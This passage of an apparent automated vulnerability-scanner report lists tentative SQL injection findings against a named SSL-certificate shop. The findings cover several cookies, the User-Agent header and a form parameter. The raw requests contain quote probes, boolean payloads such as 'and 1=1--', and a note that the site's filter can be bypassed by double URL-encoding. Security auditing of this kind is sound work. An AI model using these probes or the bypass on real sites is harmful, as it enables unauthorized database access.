Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ve%5Btitle%5D=QuickSSL+Premium+Certificates+from+Geotrust+as+low+as+%2496.50%2Fyear.+Cheapssls.com+-+Same
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:24 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=av3i5cjq840r8oducgipgvfit5; expires=Sat, 17-Sep-2011 21:50:24 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:50:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:24 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
Content-Length: 791
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ve%5Btitle%5D=QuickSSL+Premium+Certificates+from+Geotrust+as+low+as+%2496.50%2Fyear.+Cheapssls.com+-+Same
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:27 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:26 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.9. http://www.cheapssls.com/index.php [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424'; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:38 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=pkocsogmbaf1vi4iaajpdf4716; expires=Sat, 17-Sep-2011 21:49:38 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:49:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:38 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424''; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:42 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:41 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.10. http://www.cheapssls.com/index.php [stat_uniq_code cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The stat_uniq_code cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the stat_uniq_code cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the stat_uniq_code cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386%2527; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:21 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=rbvfnqfkmjp3bd4bj763nicgg1; expires=Sat, 17-Sep-2011 21:49:21 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386%2527; expires=Sun, 02-Sep-2012 21:49:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:21 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386%2527%2527; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:25 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:24 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.11. https://www.cheapssls.com/index.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1'
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 22:10:56 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=7uv22qlq49s55pskbvdl5fqoi1; expires=Sat, 17-Sep-2011 22:10:56 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386%27+and+1%3D1--+; expires=Sun, 02-Sep-2012 22:10:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 22:10:56 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 22:10:58 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 22:10:57 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.12. https://www.cheapssls.com/index.php [sgTrackerUserId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The sgTrackerUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sgTrackerUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sgTrackerUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga%2527; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:58:29 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=s5n3ao5d0ilonagm1tiit14ai7; expires=Sat, 17-Sep-2011 21:58:29 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:58:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:58:28 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga%2527%2527; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:58:31 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:58:31 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.13. https://www.cheapssls.com/index.php [ve%5Bbrowser%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Bbrowser%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Bbrowser%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ve%5Bbrowser%5D request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome%2527&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:27 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=m7sdcbeh2rbhf9s59luj62vj82; expires=Sat, 17-Sep-2011 21:50:27 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:50:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:27 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

